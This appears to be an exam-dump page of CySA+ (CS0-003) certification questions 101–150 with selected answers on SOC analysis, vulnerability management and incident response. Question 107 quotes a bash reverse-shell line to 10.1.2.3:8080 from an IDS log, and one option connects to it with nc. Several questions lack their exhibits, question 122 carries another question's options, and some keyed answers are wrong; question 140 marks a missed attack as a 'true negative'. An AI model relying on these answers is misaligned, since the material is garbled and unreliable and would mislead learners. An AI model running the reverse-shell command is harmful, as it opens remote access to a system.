CS0-003 Topic 3
Question #: 101
Topic #: 1
An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?
A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook
Selected Answer: C
Question #: 102
Topic #: 1
An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?
A. SOAR
B. SIEM
C. SLA
D. IoC
Selected Answer: A
Question #: 103
Topic #: 1
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?
A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.
Selected Answer: A
Question #: 104
Topic #: 1
Which of the following describes the best reason for conducting a root cause analysis?
A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.
Selected Answer: D
Question #: 105
Topic #: 1
Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on
Selected Answer: C
Question #: 106
Topic #: 1
A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?
A. SIEM
B. CASB
C. SOAR
D. EDR
Selected Answer: D
Question #: 107
Topic #: 1
A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo “Malicious activity” || echo “OK”
B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Malicious activity” || echo “OK”
D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”
Selected Answer: D
Question #: 108
Topic #: 1
A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?
A. Implement segmentation with ACLs.
B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.
Selected Answer: A
Question #: 109
Topic #: 1
A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?
A. Deploy a WAF to the front of the application.
B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.
Selected Answer: B
Question #: 110
Topic #: 1
A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?
A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.
Selected Answer: C
Question #: 111
Topic #: 1
A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?
A. Nmap
B. TCPDump
C. SIEM
D. EDR
Selected Answer: B
Question #: 112
Topic #: 1
A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:
Which of the following vulnerability types is the security analyst validating?
A. Directory traversal
B. XSS
C. XXE
D. SSRF
Selected Answer: C
Question #: 113
Topic #: 1
Which of the following is the most important factor to ensure accurate incident response reporting?
A. A well-defined timeline of the events
B. A guideline for regulatory reporting
C. Logs from the impacted system
D. A well-developed executive summary
Selected Answer: A
Question #: 114
Topic #: 1
A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?
A. grep [IP address] packets.pcap
B. cat packets.pcap | grep [IP Address]
C. tcpdump -n -r packets.pcap host [IP address]
D. strings packets.pcap | grep [IP Address]
Selected Answer: C
Question #: 115
Topic #: 1
A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?
A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Selected Answer: C
Question #: 116
Topic #: 1
A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)
A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level
B. Review the headers from the forwarded email
C. Examine the recipient address field
D. Review the Content-Type header
E. Evaluate the HELO or EHLO string of the connecting email server
F. Examine the SPF, DKIM, and DMARC fields from the original email
Selected Answer: BF
Question #: 117
Topic #: 1
A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?
A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L – Base Score 6.0
B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L – Base Score 7.2
C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H – Base Score 6.4
D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L – Base Score 6.5
Selected Answer: D
Question #: 118
Topic #: 1
A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?
A. Integrate an IT service delivery ticketing system to track remediation and closure
B. Create a compensating control item until the system can be fully patched
C. Accept the risk and decommission current assets as end of life
D. Request an exception and manually patch each system
Selected Answer: A
Question #: 119
Topic #: 1
Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
A. Join an information sharing and analysis center specific to the company’s industry
B. Upload threat intelligence to the IPS in STIX’TAXII format
C. Add data enrichment for IPs in the ingestion pipeline
D. Review threat feeds after viewing the SIEM alert
Selected Answer: C
Question #: 120
Topic #: 1
An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?
A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption
Selected Answer: B
Question #: 121
Topic #: 1
A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?
A. Deploy agents on all systems to perform the scans
B. Deploy a central scanner and perform non-credentialed scans
C. Deploy a cloud-based scanner and perform a network scan
D. Deploy a scanner sensor on every segment and perform credentialed scans
Selected Answer: A
Question #: 122
Topic #: 1
An organization’s email account was compromised by a bad actor. Given the following information:
Which of the following is the length of time the team took to detect the threat?
A. Data masking
B. Hashing
C. Watermarking
D. Encoding
Selected Answer: C
Question #: 123
Topic #: 1
A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?
A. Data masking
B. Hashing
C. Watermarking
D. Encoding
Selected Answer: A
Question #: 124
Topic #: 1
The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company’s domain name is used as both the sender and the recipient?
A. The message fails a DMARC check
B. The sending IP address is the hosting provider
C. The signature does not meet corporate standards
D. The sender and reply address are different
Selected Answer: A
Question #: 125
Topic #: 1
During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?
A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering
Selected Answer: A
Question #: 126
Topic #: 1
An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?
A. Blocklisting
B. Allowlisting
C. Graylisting
D. Webhooks
Selected Answer: B
Question #: 127
Topic #: 1
During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?
A. Shut down the server.
B. Reimage the server.
C. Quarantine the server.
D. Update the OS to latest version.
Selected Answer: C
Question #: 128
Topic #: 1
An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?
A. Perform a tabletop drill based on previously identified incident scenarios.
B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.
Selected Answer: A
Question #: 129
Topic #: 1
Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?
A. Deploy a database to aggregate the logging
B. Configure the servers to forward logs to a SIEM
C. Share the log directory on each server to allow local access.
D. Automate the emailing of logs to the analysts.
Selected Answer: B
Question #: 130
Topic #: 1
Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?
A. Mean time to detect
B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime
Selected Answer: B
Question #: 131
Topic #: 1
After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?
A. Transfer
B. Accept
C. Mitigate
D. Avoid
Selected Answer: C
Question #: 132
Topic #: 1
A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?
A. Wipe the computer and reinstall software
B. Shut down the email server and quarantine it from the network
C. Acquire a bit-level image of the affected workstation
D. Search for other mail users who have received the same file
Selected Answer: D
Question #: 133
Topic #: 1
The security analyst received the monthly vulnerability report. The following findings were included in the report:
• Five of the systems only required a reboot to finalize the patch application
• Two of the servers are running outdated operating systems and cannot be patched
The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?
A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery
Selected Answer: A
Question #: 134
Topic #: 1
The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:
Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?
A. Vulnerability A
B. Vulnerability B
C. Vulnerability C
D. Vulnerability D
Selected Answer: A
Question #: 135
Topic #: 1
An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?
A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.
Selected Answer: C
Question #: 136
Topic #: 1
A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:
Which of the following vulnerabilities should be prioritized for remediation?
A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills
Selected Answer: D
Question #: 137
Topic #: 1
A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?
A. Increasing training and awareness for all staff
B. Ensuring that malicious websites cannot be visited
C. Blocking all scripts downloaded from the internet
D. Disabling all staff members’ ability to run downloaded applications
Selected Answer: A
Question #: 138
Topic #: 1
A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a mismatch in the login. html file hash. After comparing the code with the previous version of the page source code, the analyst found the following code snippet added:
Which of the following best describes the activity the analyst has observed?
A. Obfuscated links
B. Exfiltration
C. Unauthorized changes
D. Beaconing
Selected Answer: B
Question #: 139
Topic #: 1
A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?
A. Credentialed scar
B. External scan
C. Differential scan
D. Network scan
Selected Answer: A
Question #: 140
Topic #: 1
An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?
A. False positive
B. True negative
C. False negative
D. True positive
Selected Answer: B
Question #: 141
Topic #: 1
A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?
A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan
Selected Answer: B
Question #: 142
Topic #: 1
Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
A. SLA
B. MOU
C. Best-effort patching
D. Organizational governance
Selected Answer: A
Question #: 143
Topic #: 1
Which of the following risk management principles is accomplished by purchasing cyber insurance?
A. Accept
B. Avoid
C. Mitigate
D. Transfer
Selected Answer: D
Question #: 144
Topic #: 1
A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding?
A. Establish quarterly SDLC training on the top vulnerabilities for developers
B. Conduct a yearly inspection of the code repositories and provide the report to management.
C. Hire an external penetration test of the network
D. Deploy more vulnerability scanners for increased coverage
Selected Answer: A
Question #: 145
Topic #: 1
An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.)
A. Data classification
B. Data destruction
C. Data loss prevention
D. Encryption
E. Backups
F. Access controls
Selected Answer: DF
Question #: 146
Topic #: 1
An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?
A. The scanner is running without an agent installed.
B. The scanner is running in active mode.
C. The scanner is segmented improperly
D. The scanner is configured with a scanning window
Selected Answer: B
Question #: 147
Topic #: 1
An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?
A. Set user account control protection to the most restrictive level on all devices
B. Implement MFA requirements for all internal resources
C. Harden systems by disabling or removing unnecessary services
D. Implement controls to block execution of untrusted applications
Selected Answer: C
Question #: 148
Topic #: 1
A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive deployment of compensating controls deployment first. The systems have been grouped into the categories shown below:
Which of the following groups should be prioritized for compensating controls?
A. Group A
B. Group B
C. Group C
D. Group D
Selected Answer: C
Question #: 149
Topic #: 1
A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?
A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK
Selected Answer: D
Question #: 150
Topic #: 1
Which of the following actions would an analyst most likely perform after an incident has been investigated?
A. Risk assessment
B. Root cause analysis
C. Incident response plan
D. Tabletop exercise
Selected Answer: B